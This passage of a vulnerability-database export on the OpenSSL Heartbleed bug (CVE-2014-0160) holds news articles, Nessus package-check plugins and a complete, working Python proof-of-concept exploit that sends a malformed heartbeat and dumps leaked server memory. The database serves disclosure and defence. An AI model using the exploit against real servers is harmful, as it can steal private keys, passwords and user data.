recvmsg(s)\r\n\t\t\tif typ == None:\r\n\t\t\t\tprint &#39;Server closed connection without sending Server Hello.&#39;\r\n\t\t\t\treturn\r\n\t\t\t# Look for server hello done message.\r\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\r\n\t\t\t\tbreak\r\n\r\n\t\tprint &#39;Sending heartbeat request...&#39;\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hb(version[i][1]))\r\n\t\tif hit_hb(s,create_hb(version[i][1])):\r\n\t\t\t#Stop if vulnerable\r\n\t\t\tbreak\r\n\r\nif __name__ == &#39;__main__&#39;:\r\n\tmain()\n                              ",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": "https://www.seebug.org/vuldb/ssvid-86038"
        },
        {
            "lastseen": "2017-11-19T17:28:38",
            "description": "CVE ID:CVE-2014-0160\r\n\r\nOpenSSL\u662f\u4e00\u79cd\u5f00\u653e\u6e90\u7801\u7684SSL\u5b9e\u73b0\uff0c\u7528\u6765\u5b9e\u73b0\u7f51\u7edc\u901a\u4fe1\u7684\u9ad8\u5f3a\u5ea6\u52a0\u5bc6\uff0c\u73b0\u5728\u88ab\u5e7f\u6cdb\u5730\u7528\u4e8e\u5404\u79cd\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u4e2d\u3002\r\n\r\n\u7531\u4e8e\u5904\u7406TLS heartbeat\u6269\u5c55\u65f6\u7684\u8fb9\u754c\u9519\u8bef\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u62ab\u9732\u8fde\u63a5\u7684\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5b58\u50a8\u5668\u5185\u5bb9\u3002\r\n0\r\nOpenSSL 1.0.2-beta\r\nOpenSSL 1.0.1\r\nOpenSSL 1.0.1g\u7248\u672c\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u5347\u7ea7\u4f7f\u7528\uff1a\r\nhttp://www.openssl.org/",
            "published": "2014-04-08T00:00:00",
            "title": "OpenSSL TLS Hearbeat\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e",
            "type": "seebug",
            "bulletinFamily": "exploit",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-08T00:00:00",
            "href": "https://www.seebug.org/vuldb/ssvid-62086",
            "id": "SSV:62086",
            "sourceData": "\n                                                #!/usr/bin/python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])\r\n# The author disclaims copyright to this source code.\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n    return x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nhello = h2bin('''\r\n16 03 02 00  dc 01 00 00 d8 03 02 53\r\n43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00\r\n00 0f 00 01 01                                  \r\n''')\r\n\r\nhb = h2bin(''' \r\n18 03 02 00 03\r\n01 40 00\r\n''')\r\n\r\ndef hexdump(s):\r\n    for b in xrange(0, len(s), 16):\r\n        lin = [c for c in s[b : b + 16]]\r\n        hxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n        pdat = ''.join((c if 32 &lt;= ord(c) &lt;= 126 else '.' )for c in lin)\r\n        print '  %04x: %-48s %s' % (b, hxdat, pdat)\r\n    print\r\n\r\ndef recvall(s, length, timeout=5):\r\n    endtime = time.time() + timeout\r\n    rdata = ''\r\n    remain = length\r\n    while remain &gt; 0:\r\n        rtime = endtime - time.time() \r\n        if rtime &lt; 0:\r\n            return None\r\n        r, w, e = select.select([s], [], [], 5)\r\n        if s in r:\r\n            data = s.recv(remain)\r\n            # EOF?\r\n            if not data:\r\n                return None\r\n            rdata += data\r\n            remain -= len(data)\r\n    return rdata\r\n        \r\n\r\ndef recvmsg(s):\r\n    hdr = recvall(s, 5)\r\n    if hdr is None:\r\n        print 'Unexpected EOF receiving record header - server closed connection'\r\n        return None, None, None\r\n    typ, ver, ln = struct.unpack('&gt;BHH', hdr)\r\n    pay = recvall(s, ln, 10)\r\n    if pay is None:\r\n        print 'Unexpected EOF receiving record payload - server closed connection'\r\n        return None, None, None\r\n    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n    return typ, ver, pay\r\n\r\ndef hit_hb(s):\r\n    s.send(hb)\r\n    while True:\r\n        typ, ver, pay = recvmsg(s)\r\n        if typ is None:\r\n            print 'No heartbeat response received, server likely not vulnerable'\r\n            return False\r\n\r\n        if typ == 24:\r\n            print 'Received heartbeat response:'\r\n            hexdump(pay)\r\n            if len(pay) &gt; 3:\r\n                print 'WARNING: server returned more data than it should - server is vulnerable!'\r\n            else:\r\n                print 'Server processed malformed heartbeat, but did not return any extra data.'\r\n            return True\r\n\r\n        if typ == 21:\r\n            print 'Received alert:'\r\n            hexdump(pay)\r\n            print 'Server returned error, likely not vulnerable'\r\n            return False\r\n\r\ndef main():\r\n    opts, args = options.parse_args()\r\n    if len(args) &lt; 1:\r\n        options.print_help()\r\n        return\r\n\r\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n    print 'Connecting...'\r\n    sys.stdout.flush()\r\n    s.connect((args[0], opts.port))\r\n    print 'Sending Client Hello...'\r\n    sys.stdout.flush()\r\n    s.send(hello)\r\n    print 'Waiting for Server Hello...'\r\n    sys.stdout.flush()\r\n    while True:\r\n        typ, ver, pay = recvmsg(s)\r\n        if typ == None:\r\n            print 'Server closed connection without sending Server Hello.'\r\n            return\r\n        # Look for server hello done message.\r\n        if typ == 22 and ord(pay[0]) == 0x0E:\r\n            break\r\n\r\n    print 'Sending heartbeat request...'\r\n    sys.stdout.flush()\r\n    s.send(hb)\r\n    hit_hb(s)\r\n\r\nif __name__ == '__main__':\r\n    main()\n                              ",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            },
            "sourceHref": "https://www.seebug.org/vuldb/ssvid-62086"
        }
    ],
    "thn": [
        {
            "lastseen": "2018-01-27T09:18:11",
            "bulletinFamily": "info",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "[![ More than Half a million websites vulnerable to OpenSSL Heartbleed Zero-day Attack](https://1.bp.blogspot.com/-3SCoP4FOfiE/U0RKMR7pksI/AAAAAAAAbHo/1YEQztc6eEw/s728/OpenSSL-Heartbleed-vulnerability-CVE-2014-0160.png)](<https://1.bp.blogspot.com/-3SCoP4FOfiE/U0RKMR7pksI/AAAAAAAAbHo/1YEQztc6eEw/s1600/OpenSSL-Heartbleed-vulnerability-CVE-2014-0160.png>)\n\nIt is advised to those who are running their web server with OpenSSL 1.0.1 through 1.0, then it is significantly important that you update to OpenSSL 1.0.1g immediately or as soon as possible. \n\n  \n\n\nAs this afternoon, an extremely critical programming flaw in the OpenSSL has been discovered that apparently exposed the cryptographic keys and private data from some of the most important sites and services on the Internet.\n\n  \n\n\nThe bug was independently discovered by security firm _[Codenomicon](<http://www.codenomicon.com/>)_ along with a Google Security engineer. The flaw is in the popular OpenSSL cryptographic software library and its weakness allows cyber criminals to steal the information protected, under normal conditions, by the SSL (Secure Sockets Layer) or TLS (Transport Security Layer) [encryption](<https://thehackernews.com/search/label/encryption>) used to secure the Internet.\n\n  \n\n\nOpenSSL is an open-source implementation of the SSL and TLS protocols. The core library implements the basic cryptographic functions that enable SSL and TLS encryption. Mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n  \n\n\n**HEARTBLEED BUG**\n\nThe discoverer of the vulnerability dubbed the bug as \u2018_[Heartbleed bug](<http://heartbleed.com/>)_\u2019, as the exploit rests on a bug in the implementation of OpenSSL\u2019s TLS/DTLS (transport layer security protocols) heartbeat extension (RFC6520).\n\n  \n\n\nThis critical bug with code ID_ CVE-2014-0160_, could allows an attacker to expose up to 64kB of memory from the server or a connected client computer running a vulnerable version of OpenSSL software. Specifically, this means that an attacker can steal keys, passwords and other private information remotely.\n\n  \n\n\n\u201c_We have tested some of our own services from attacker\u2019s perspective. We attacked ourselves from outside, without leaving a trace. Without using any privileged information or credentials we were able steal from ourselves the secret keys used for our X.509 certificates, usernames and passwords, instant messages, emails and business critical documents and communication_.\u201d\n\n  \n\n\nThe [vulnerability](<https://thehackernews.com/search/label/Vulnerability>) in the OpenSSL\u2019s transport layer security (TSL) protocols\u2019 heartbeat section has been in the wild since March 2012 and is supposed to be even more dangerous than [Apple\u2019s recent SSL bug](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>), which outcropped the possibility for man-in-the-middle (MitM) attacks.\n\n  \n\n\nAs the Heartbleed bug reveals encryption keys that could lead to other compromises, affects past traffic and may affect as much as 66 percent of Internet websites over the internet. 10 out of top 1000 sites are vulnerable to this flaw, including Yahoo Mail, Lastpass and the FBI site. There also is a proof-of-concept exploit for the flaw [posted on Github](<https://gist.github.com/takeshixx/10107280>). On this [website](<https://filippo.io/Heartbleed/>), you can check if your web server is vulnerable or not.\n\n  \n\n\n\"_Bugs in single software or library come and go and are fixed by new versions,_\" the researchers who discovered the vulnerability wrote in a blog post published Monday. \"_However this bug has left a large amount of private keys and other secrets exposed to the Internet. Considering the long exposure, ease of exploitations and attacks leaving no trace this exposure should be taken seriously._\"\n\n  \n\n\nFixes for the bug have been released by the researchers. So, who are running the OpenSSL 1.0.1f version may update to [OpenSSL 1.0.1g](<https://www.openssl.org/>). The users running older version of OpenSSL are safe.  \n  \n**Related Important Articles:**  \n  \n  \n  \n  \n\n\n  * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n  * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n  * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n  * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n",
            "modified": "2014-04-12T09:01:01",
            "published": "2014-04-08T08:23:00",
            "id": "THN:0F7112302CBABF46D19CACCCFA6103C5",
            "href": "https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html",
            "type": "thn",
            "title": "Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        },
        {
            "lastseen": "2018-01-27T09:17:12",
            "bulletinFamily": "info",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "description": "[![Billions of Smartphone Users affected by Heartbleed Vulnerability](https://4.bp.blogspot.com/-Q0TNjq7Fcx8/U0riot0TcrI/AAAAAAAAbMs/99nvaMv2pwQ/s728/Android-blackberry-apple-iphone-heartbleed.jpg)](<https://4.bp.blogspot.com/-Q0TNjq7Fcx8/U0riot0TcrI/AAAAAAAAbMs/99nvaMv2pwQ/s1600/Android-blackberry-apple-iphone-heartbleed.jpg>)\n\n[Heartbleed](<https://thehackernews.com/search/label/Heartbleed%20bug>) has left a worst impression worldwide affecting millions of websites and is also supposed to put millions of Smartphones and tablets users at a great risk.\n\n  \n\n\nHeartbleed is a critical bug (_[CVE-2014-0160](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)_) in the popular OpenSSL cryptographic software library, that actually resides in the OpenSSL's implementation of the TLS/DTLS heartbeat extension, which allows attackers to read portions of the affected server\u2019s memory, potentially revealing users data such as usernames, passwords, and credit card numbers, that the server did not intend to reveal.\n\n  \n\n\n[OpenSSL](<https://thehackernews.com/search/label/OpenSSL>) is a widely-used cryptographic library which implements the SSL and TLS protocol and protects communications on the Internet, and mostly every websites use either SSL or TLS, even the Apache web server that powers almost half of the websites over internet utilizes OpenSSL.\n\n  \n\n\nBut to assume that the users using desktop browsers to visit websites are vulnerable to the Heartbleed bug, will be wrong. Despite 40-60 billion active Smartphone applications may be sharing some of those same servers or connect to their own group of servers that may also be compromised.\n\n  \n\n\n**ANDROID**\n\nGoogle wrote in an update on its Online Security [blog](<https://googleonlinesecurity.blogspot.co.uk/2014/04/google-services-updated-to-address.html>) on Wednesday, emphasizing that Android was not vulnerable to the Heartbleed bug, except for a very specific version and can you guess that so called specific version??\n\n  \n\n\n[Android](<https://thehackernews.com/search/label/Android>) 4.1.1 Jelly Bean, the one which makes up the majority of Android devices around the world, and which relies on the vulnerable version of OpenSSL.\n\n  \n\n\nGoogle didn\u2019t reveal the actual figure that are vulnerable to the bug, but according to the latest [dashboard ](<https://developer.android.com/about/dashboards/index.html?utm_source=ausdroid.net>)released by Google, it is estimated that around 34.4% of the Android devices in use today are running the Android 4.1.x version. \n\n  \n\n\nEven last September Google announced that it had activated one billion devices. This means that the minimal number is likely to be in the millions. So, one can imagine how many Smartphones and tablets were at risk.\n\n  \n\n\nWell, Google has released the patches for Android 4.1.1 which is being distributed among the Android partners.\n\n  \n\n\n**APPLE**\n\n[Apple](<https://thehackernews.com/search/label/Apple>) users can be relaxed knowing that their devices running iOS and OS X are not affected by the most critical security flaw, Heartbleed.\n\n  \n\n\n\"_Apple takes security very seriously. IOS and OS X never incorporated the vulnerable software and key web-based services were not affected_,\" Apple told [Re/code](<http://recode.net/2014/04/10/apple-says-ios-osx-and-key-web-services-not-affected-by-heartbleed-security-flaw/>).\n\n  \n\n\nInstead using OpenSSL, Apple relies on different SSL/TLS libraries called Secure Transport, which was hit by its own very serious bug in February outcropping the possibility for [man-in-the-middle (MitM) attacks](<https://thehackernews.com/2014/02/apples-ssl-vulnerability-may-allowed.html>) \u2014 though it wasn't as dangerous as the recent OpenSSL Heartbleed security Flaw.\n\n  \n\n\nBut still Apple users were not exempted completely, as the users using BBM for private messages on iOS might have been vulnerable to this flaw.\n\n  \n\n\n**BLACKBERRY**\n\nBlackberry [confirmed](<http://btsc.webapps.blackberry.com/btsc/viewdocument.do?externalId=KB35882&sliceId=1&cmd=displayKC&docType=kc&noCount=true&ViewedDocsListHelper=com.kanisa.apps.common.BaseViewedDocsListHelperImpl>) that some of its products, including Secure Work Space for iOS and Android, and BlackBerry Link for Windows and Mac OS and even BBM for iOS and Android were vulnerable to the Heartbleed security flaw. The figure of affected users is not least, as about 80 million people use BBM service.\n\n  \n\n\nThey have also assured that BlackBerry Smartphones and tablets, BlackBerry Enterprise Server 5, BlackBerry Enterprise Service 10, and the BlackBerry Infrastructure are not affected by the flaw and are fully protected.\n\n  \n\n\n**Related Important Articles:**\n\n  * [How Heartbleed Bug Exposes Your Passwords to Hackers](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n  * [German Developer responsible for HeartBleed Bug in OpenSSL](<https://thehackernews.com/2014/04/german-developer-responsible-for.html>)\n  * [How to Protect yourself from the 'Heartbleed' Bug](<https://thehackernews.com/2014/04/how-heartbleed-bug-exposes-your.html>)\n  * [Heartbleed - OpenSSL Zero-day Bug leaves Millions of websites Vulnerable](<https://thehackernews.com/2014/04/heartbleed-openssl-zero-day-bug-leaves.html>)\n  * [NSA denies Report that Agency knew and exploited Heartbleed Vulnerability](<https://thehackernews.com/2014/04/NSA-Heartbleed-Vulnerability-OpenSSL-Robin-Seggelmann.html>)\n",
            "modified": "2014-04-13T19:32:50",
            "published": "2014-04-13T08:19:00",
            "id": "THN:4868B616BCBA555DA2446F6F0EA837B0",
            "href": "https://thehackernews.com/2014/04/billions-of-smartphone-users-affected_13.html",
            "type": "thn",
            "title": "Billions of Smartphone Users affected by Heartbleed Vulnerability",
            "cvss": {
                "score": 5.0,
                "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"
            }
        }
    ],
    "nessus": [
        {
            "lastseen": "2021-01-12T10:12:42",
            "description": "Fixes CVE-2014-0160 (RHBZ #1085066)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.",
            "edition": 13,
            "published": "2014-04-16T00:00:00",
            "title": "Fedora 19 : mingw-openssl-1.0.1e-6.fc19 (2014-4999) (Heartbleed)",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-16T00:00:00",
            "cpe": [
                "cpe:/o:fedoraproject:fedora:19",
                "p-cpe:/a:fedoraproject:fedora:mingw-openssl"
            ],
            "id": "FEDORA_2014-4999.NASL",
            "href": "https://www.tenable.com/plugins/nessus/73547",
            "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were  \n# extracted from Fedora Security Advisory 2014-4999.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n  script_id(73547);\n  script_version(\"1.13\");\n  script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_xref(name:\"FEDORA\", value:\"2014-4999\");\n\n  script_name(english:\"Fedora 19 : mingw-openssl-1.0.1e-6.fc19 (2014-4999) (Heartbleed)\");\n  script_summary(english:\"Checks rpm output for the updated package.\");\n\n  script_set_attribute(\n    attribute:\"synopsis\", \n    value:\"The remote Fedora host is missing a security update.\"\n  );\n  script_set_attribute(\n    attribute:\"description\", \n    value:\n\"Fixes CVE-2014-0160 (RHBZ #1085066)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1085066\"\n  );\n  # https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131532.html\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"http://www.nessus.org/u?68a0bc69\"\n  );\n  script_set_attribute(\n    attribute:\"solution\", \n    value:\"Update the affected mingw-openssl package.\"\n  );\n  script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n  script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n  script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n  script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n  script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:mingw-openssl\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n  script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/14\");\n  script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n  script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/16\");\n  script_end_attributes();\n\n  script_category(ACT_GATHER_INFO);\n  script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n  script_family(english:\"Fedora Local Security Checks\");\n\n  script_dependencies(\"ssh_get_info.nasl\");\n  script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n  exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"mingw-openssl-1.0.1e-6.fc19\")) flag++;\n\n\nif (flag)\n{\n  if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n  else security_hole(0);\n  exit(0);\n}\nelse\n{\n  tested = pkg_tests_get();\n  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n  else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mingw-openssl\");\n}\n",
            "cvss": {
                "score": 9.4,
                "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:N"
            }
        },
        {
            "lastseen": "2021-01-07T10:43:40",
            "description": "OpenSSL Reports :\n\nA missing bounds check in the handling of the TLS heartbeat extension\ncan be used to reveal up to 64k of memory to a connected client or\nserver.\n\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to\nimmediately upgrade can alternatively recompile OpenSSL with\n-DOPENSSL_NO_HEARTBEATS.\n\nThe bug allows anyone on the Internet to read the memory of the\nsystems protected by the vulnerable versions of the OpenSSL software.\nThis compromises the secret keys used to identify the service\nproviders and to encrypt the traffic, the names and passwords of the\nusers and the actual content. This allows attackers to eavesdrop\ncommunications, steal data directly from the services and users and to\nimpersonate services and users.\n\nThe code used to handle the Heartbeat Extension does not do sufficient\nboundary checks on record length, which allows reading beyond the\nactual payload.",
            "edition": 20,
            "published": "2014-04-08T00:00:00",
            "title": "FreeBSD : OpenSSL -- Remote Information Disclosure (5631ae98-be9e-11e3-b5e3-c80aa9043978)",
            "type": "nessus",
            "bulletinFamily": "scanner",
            "cvelist": [
                "CVE-2014-0160"
            ],
            "modified": "2014-04-08T00:00:00",
            "cpe": [
                "p-cpe:/a:freebsd:freebsd:mingw32-openssl",
                "cpe:/o:freebsd:freebsd",
                "p-cpe:/a:freebsd:freebsd:openssl"
            ],
            "id": "FREEBSD_PKG_5631AE98BE9E11E3B5E3C80AA9043978.NASL",
            "href": "https://www.tenable.com/plugins/nessus/73389",
            "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were  \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2014 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n#    copyright notice, this list of conditions and the following\n#    disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n#    published online in any format, converted to PDF, PostScript,\n#    RTF and other formats) must reproduce the above copyright\n#    notice, this list of conditions and the following disclaimer\n#    in the documentation and/or other materials provided with the\n#    distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n  script_id(73389);\n  script_version(\"1.13\");\n  script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n  script_cve_id(\"CVE-2014-0160\");\n  script_xref(name:\"FreeBSD\", value:\"FreeBSD-SA-14:06.openssl\");\n\n  script_name(english:\"FreeBSD : OpenSSL -- Remote Information Disclosure (5631ae98-be9e-11e3-b5e3-c80aa9043978)\");\n  script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n  script_set_attribute(\n    attribute:\"synopsis\", \n    value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n  );\n  script_set_attribute(\n    attribute:\"description\", \n    value:\n\"OpenSSL Reports :\n\nA missing bounds check in the handling of the TLS heartbeat extension\ncan be used to reveal up to 64k of memory to a connected client or\nserver.\n\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to\nimmediately upgrade can alternatively recompile OpenSSL with\n-DOPENSSL_NO_HEARTBEATS.\n\nThe bug allows anyone on the Internet to read the memory of the\nsystems protected by the vulnerable versions of the OpenSSL software.\nThis compromises the secret keys used to identify the service\nproviders and to encrypt the traffic, the names and passwords of the\nusers and the actual content. This allows attackers to eavesdrop\ncommunications, steal data directly from the services and users and to\nimpersonate services and users.\n\nThe code used to handle the Heartbeat Extension does not do sufficient\nboundary checks on record length, which allows reading beyond the\nactual payload.\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"https://www.openssl.org/news/secadv_20140407.txt\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0076\"\n  );\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"http://www.heartbleed.com\"\n  );\n  # http://www.freebsd.org/ports/portaudit/5631ae98-be9e-11e3-b5e3-c80aa9043978.html\n  script_set_attribute(\n    attribute:\"see_also\",\n    value:\"http://www.nessus.org/u?ccfdc540\"\n  );\n  script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n  script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:N\");\n  script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n  script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n  script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n  script_set_attribute(attribute:\"metasploit_name\", value:'OpenSSL Heartbeat (Heartbleed) Information Leak');\n  script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n  script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:mingw32-openssl\");\n  script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:openssl\");\n  script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n  script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/07\");\n  script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/07\");\n  script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/08\");\n  script_end_attributes();\n\n  script_category(ACT_GATHER_INFO);\n  script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n  script_family(english:\"FreeBSD Local Security Checks\");\n\n  script_dependencies(\"ssh_get_info.nasl\");\n  script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n  exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, 